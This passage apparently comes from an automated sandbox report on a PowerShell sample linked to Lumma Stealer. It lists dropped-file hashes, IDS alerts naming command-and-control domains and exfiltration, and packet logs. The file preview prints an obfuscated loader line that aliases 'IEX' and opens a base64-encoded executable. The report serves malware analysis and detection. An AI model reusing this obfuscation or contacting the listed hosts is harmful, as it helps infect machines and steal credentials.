                                                                  SHA-512:6408477C72EEAD87AABA16CB9E7A46459BBF47BEE055A2F36896BB1275EDC9108F145D1F7879C6D485611156BBD372C08C5930D8B93199CABDF3AEA6F049F943
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.P.o.w.e.r.S.h.e.l.l.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.3.1.3.2.7.9.5.0.8.8.9.7.9.....R.e.p.o.r.t.T.y.p.e.=.1.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.3.1.3.2.3.1.6.4.3.8.9.6.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.e.a.f.d.a.4.c.-.7.3.f.2.-.4.7.a.9.-.8.c.d.5.-.0.3.b.e.b.5.1.5.a.f.7.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.P.o.w.e.r.S.h.e.l.l...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.c.f.0.-.0.0.0.1.-.0.0.1.4.-.2.a.c.e.-.d.e.b.7.5.5.6.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.f.4.3.d.9.b.b.3.1.6.e.3.0.a.e.1.a.3.4.9.4.a.c.5.b.0.6.2.4.f.6.b.e.a.1.b.f.0.5.4.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.3.7././.0.6././.1.0.:.0.7.:.4.5.:.2.5.!.7.d.6.d.a.!.p.o.w.e.r.s.h.e.l.l...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.7.2.9.5.....T.a.r.g.e.
                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):7288
                                                                  Entropy (8bit):3.7391905680956112
                                                                  Encrypted:false
                                                                  SSDEEP:192:R6l7wVeJr3x6Y9LxHbgmft887cpV3aX7m:R6lXJrx6YBxHbgmftZoCy
                                                                  MD5:69D682DB088C2719B46A65B43E427F54
                                                                  SHA1:A8AACD59B448FBA7E3BDF9DFAC16B9E430498CB9
                                                                  SHA-256:E879F748EF2C3004A3CAD6FC479BD117FA4581993D885CC0285A6E4857227FE2
                                                                  SHA-512:D1B57D5D6CD5F6ED22968485FC7892D3497AF023462CADBD512DCBE7CE01F8282B1C66A1324947312EB0C518F9F24C350A68584634BAB43D24EBEBCAB0434915
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.4.0.8.<./.P.i.
                                                                  Process:C:\Windows\System32\wermgr.exe
                                                                  File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4905
                                                                  Entropy (8bit):4.688993761991504
                                                                  Encrypted:false
                                                                  SSDEEP:96:uIjfBI7MwW7VmJFKloF1cmFzcWTzF1cmF2ufnd:uIlYMwW7A4Jq7UNufd
                                                                  MD5:43E5AD6642DD1F73286C4AE7DBA9DDDF
                                                                  SHA1:46AE11BE1634A27AB020115052AA9C18A4ED998A
                                                                  SHA-256:CAFFD14C85E3869080F87F36620803D3B3DBD26926576AB84EBE5B3C17FDD401
                                                                  SHA-512:0D9BFCC14F5379245FE753F272AE87ACB6D0C4E485CAB1B816B190AE799B169167B1E885422D446797CCBC018D642FA95355F28213B7B1D1A2599E3B25253DC8
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="675269" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):11608
                                                                  Entropy (8bit):4.890472898059848
                                                                  Encrypted:false
                                                                  SSDEEP:192:6xoe5qpOZxoe54ib4ZVsm5emdqVFn3eGOVpN6K3bkkjo5OgkjDt4iWN3yBGHVQ9R:9rib4ZmVoGIpN6KQkj2Fkjh4iUxsT6YP
                                                                  MD5:8A4B02D8A977CB929C05D4BC2942C5A9
                                                                  SHA1:F9A6426CAF2E8C64202E86B07F1A461056626BEA
                                                                  SHA-256:624047EB773F90D76C34B708F48EA8F82CB0EC0FCF493CA2FA704FCDA7C4B715
                                                                  SHA-512:38697525814CDED7B27D43A7B37198518E295F992ECB255394364EC02706443FB3298CBBAA57629CCF8DDBD26FD7CAAC44524C4411829147C339DD3901281AC2
                                                                  Malicious:false
                                                                  Reputation:moderate, very likely benign file
                                                                  Preview:PSMODULECACHE......)..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........&ug.z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):64
                                                                  Entropy (8bit):1.1628158735648508
                                                                  Encrypted:false
                                                                  SSDEEP:3:NlllulLhwlz:NllUO
                                                                  MD5:F442CD24937ABD508058EA44FD91378E
                                                                  SHA1:FDE63CECA441AA1C5C9C401498F9032A23B38085
                                                                  SHA-256:E2960AF08E2EE7C9C72EEA31DBBFE1B55B9BF84DE2DD7BB7204487E6AF37B8F6
                                                                  SHA-512:927E2EEA0BB3FC3D3A0DA7F45644F594CE29F11D90A84B005D723500258DE9E8B3780EB87242F4C62B64B9FEEA1869FC16076FA3AC89EC34E0546CDE1BEF7631
                                                                  Malicious:false
                                                                  Preview:@...e................................................@..........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):60
                                                                  Entropy (8bit):4.038920595031593
                                                                  Encrypted:false
                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                  Malicious:false
                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6221
                                                                  Entropy (8bit):3.7221094830592123
                                                                  Encrypted:false
                                                                  SSDEEP:96:+nlQf33CxH5CkvhkvCCtClLv0IjHvlLv0IKHv:+lQfyZeqTLTW
                                                                  MD5:4944A55015B1938A53F5C0B46FCCC212
                                                                  SHA1:525584A334359891021CBCF2EFBD9DBACC3F2A4C
                                                                  SHA-256:EC6F30A0A1FD6B391B1EA4291D536D157F542D655ECBE46DDEEF4ED386DFB708
                                                                  SHA-512:70A1FF38D9B4CAAA90F1712596FF1293FD87686414B3414FFE25083B8BBC6300F9D26416B2B5E70BEBC28B02169A6E85FD5AC5980D55D8CD7FF023BA785CD356
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...-/.v....Z...Uf..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....I...Uf..r...Uf......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Zc;...........................%..A.p.p.D.a.t.a...B.V.1......Za;..Roaming.@......CW.^.Za;..........................W...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Ze;..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................].T.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Ze;....Q...........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):6221
                                                                  Entropy (8bit):3.7221094830592123
                                                                  Encrypted:false
                                                                  SSDEEP:96:+nlQf33CxH5CkvhkvCCtClLv0IjHvlLv0IKHv:+lQfyZeqTLTW
                                                                  MD5:4944A55015B1938A53F5C0B46FCCC212
                                                                  SHA1:525584A334359891021CBCF2EFBD9DBACC3F2A4C
                                                                  SHA-256:EC6F30A0A1FD6B391B1EA4291D536D157F542D655ECBE46DDEEF4ED386DFB708
                                                                  SHA-512:70A1FF38D9B4CAAA90F1712596FF1293FD87686414B3414FFE25083B8BBC6300F9D26416B2B5E70BEBC28B02169A6E85FD5AC5980D55D8CD7FF023BA785CD356
                                                                  Malicious:false
                                                                  Preview:...................................FL..................F.".. ...-/.v....Z...Uf..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....I...Uf..r...Uf......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Zc;...........................%..A.p.p.D.a.t.a...B.V.1......Za;..Roaming.@......CW.^.Za;..........................W...R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^.Ze;..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWR`..Windows.@......CW.^DWR`..........................].T.W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Ze;....Q...........
                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                  Category:dropped
                                                                  Size (bytes):1835008
                                                                  Entropy (8bit):4.466284072855703
                                                                  Encrypted:false
                                                                  SSDEEP:6144:dIXfpi67eLPU9skLmb0b4zWSPKaJG8nAgejZMMhA2gX4WABl0uNCdwBCswSb+:OXD94zWlLZMM6YFHc++
                                                                  MD5:B70688E6E3A66AA5D92F25B014454752
                                                                  SHA1:7ACE154329D77ED08FFC44CA8991EBC2E2B3F4AC
                                                                  SHA-256:AA02BFD6C47709F9FA04B627B0076FD37232F0D85E60294A853FE3F6A3A48AF8
                                                                  SHA-512:DB367B102CC19ED7E56420B0FDBCFA0F946BF92ABCB79381B860E8D82D1268442C4D57CE1C3F5161FF5DACEFBF87B93C4FC2AB0299DE85CA0C5E2FF28A60EDDB
                                                                  Malicious:false
                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..Uf...............................................................................................................................................................................................................................................................................................................................................{..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  File type:ASCII text, with very long lines (65478), with CRLF line terminators
                                                                  Entropy (8bit):5.485201881959517
                                                                  TrID:
                                                                    File name:92.255.57_2.112.ps1
                                                                    File size:539'177 bytes
                                                                    MD5:be4f493e0b615fa9df3216132c14f763
                                                                    SHA1:dfda3628a9b8971a043fafab4c6ee95c8b4cd5cc
                                                                    SHA256:229385fbe03dd8ab9489ee1f0f4a5916b89be800aa27b7d563b63080211235a9
                                                                    SHA512:4f69d6de21d1de46778437be2f42bbea0a92ce889091b99eb37be280dae80d410f3d69c4018dccf3398b90dd50809b4aa92767e173f0e7aace13531feceac9ac
                                                                    SSDEEP:12288:cG34WzRsAX2h7dVI42CoeUJ2z6m20sFqwg2:cGdyZPIvLJ2z20sFFg2
                                                                    TLSH:B4B47D3140533C5E3F6E2ECAA4006DC00C9D39A7BA14D154AEC992B6B2BD53B5E6D9FC
                                                                    File Content Preview:.. $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;....$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAIp2gmcAAAAAAA
                                                                    Icon Hash:3270d6baae77db44
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-01-14T08:27:11.805855+01002059189ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)1192.168.2.4589841.1.1.153UDP
                                                                    2025-01-14T08:27:11.817677+01002059211ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)1192.168.2.4605491.1.1.153UDP
                                                                    2025-01-14T08:27:11.830325+01002059201ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)1192.168.2.4569011.1.1.153UDP
                                                                    2025-01-14T08:27:11.848565+01002059203ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)1192.168.2.4600481.1.1.153UDP
                                                                    2025-01-14T08:27:11.877255+01002059199ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)1192.168.2.4647201.1.1.153UDP
                                                                    2025-01-14T08:27:11.893391+01002059207ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)1192.168.2.4607151.1.1.153UDP
                                                                    2025-01-14T08:27:11.905812+01002059209ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)1192.168.2.4540931.1.1.153UDP
                                                                    2025-01-14T08:27:11.927906+01002059191ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)1192.168.2.4538551.1.1.153UDP
                                                                    2025-01-14T08:27:12.602411+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.102.49.254443TCP
                                                                    2025-01-14T08:27:13.109424+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.449730104.102.49.254443TCP
                                                                    2025-01-14T08:27:13.819855+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732188.114.96.3443TCP
                                                                    2025-01-14T08:27:14.261530+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449732188.114.96.3443TCP
                                                                    2025-01-14T08:27:14.261530+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732188.114.96.3443TCP
                                                                    2025-01-14T08:27:14.743708+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736188.114.96.3443TCP
                                                                    2025-01-14T08:27:15.093246+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449736188.114.96.3443TCP
                                                                    2025-01-14T08:27:15.093246+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449736188.114.96.3443TCP
                                                                    2025-01-14T08:27:15.727636+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738188.114.96.3443TCP
                                                                    2025-01-14T08:27:17.659036+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740188.114.96.3443TCP
                                                                    2025-01-14T08:27:18.480783+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449740188.114.96.3443TCP
                                                                    2025-01-14T08:27:19.021812+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741188.114.96.3443TCP
                                                                    2025-01-14T08:27:20.289084+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743188.114.96.3443TCP
                                                                    2025-01-14T08:27:22.160237+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745188.114.96.3443TCP
                                                                    2025-01-14T08:27:24.845892+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748188.114.96.3443TCP
                                                                    2025-01-14T08:27:25.345878+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748188.114.96.3443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 14, 2025 08:27:11.957742929 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:11.957803965 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:11.957885981 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:11.962060928 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:11.962097883 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:12.602304935 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:12.602411032 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:12.606659889 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:12.606687069 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:12.607043028 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:12.654783964 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:12.656572104 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:12.699340105 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.109472036 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.109503984 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.109544992 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.109569073 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.109574080 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.109597921 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.109611034 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.109620094 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.109627008 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.109668016 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.199007034 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.199038029 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.199237108 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.199273109 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.203835964 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.203943014 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.203947067 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.206785917 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.316840887 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.316906929 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.316922903 CET49730443192.168.2.4104.102.49.254
                                                                    Jan 14, 2025 08:27:13.316930056 CET44349730104.102.49.254192.168.2.4
                                                                    Jan 14, 2025 08:27:13.336785078 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:13.336812973 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:13.336908102 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:13.337241888 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:13.337256908 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:13.819782019 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:13.819854975 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:13.821949005 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:13.821974993 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:13.822283983 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:13.823714018 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:13.823714018 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:13.823822975 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.261548996 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.261674881 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.261725903 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.262547970 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.262569904 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.262583971 CET49732443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.262588978 CET44349732188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.271222115 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.271271944 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.271351099 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.271692991 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.271706104 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.743582010 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.743707895 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.745166063 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.745176077 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.745490074 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:14.758286953 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.758315086 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:14.758388996 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093241930 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093332052 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093385935 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.093405008 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093419075 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093460083 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.093508005 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093589067 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093626976 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.093633890 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093688965 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093725920 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.093730927 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093800068 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.093836069 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.093842030 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.139151096 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.139183998 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.182701111 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.182786942 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.182804108 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.182965040 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.183028936 CET49736443192.168.2.4188.114.96.3
                                                                    Jan 14, 2025 08:27:15.183036089 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.183130026 CET44349736188.114.96.3192.168.2.4
                                                                    Jan 14, 2025 08:27:15.183185101 CET49736443192.168.2.4188.114.96.3
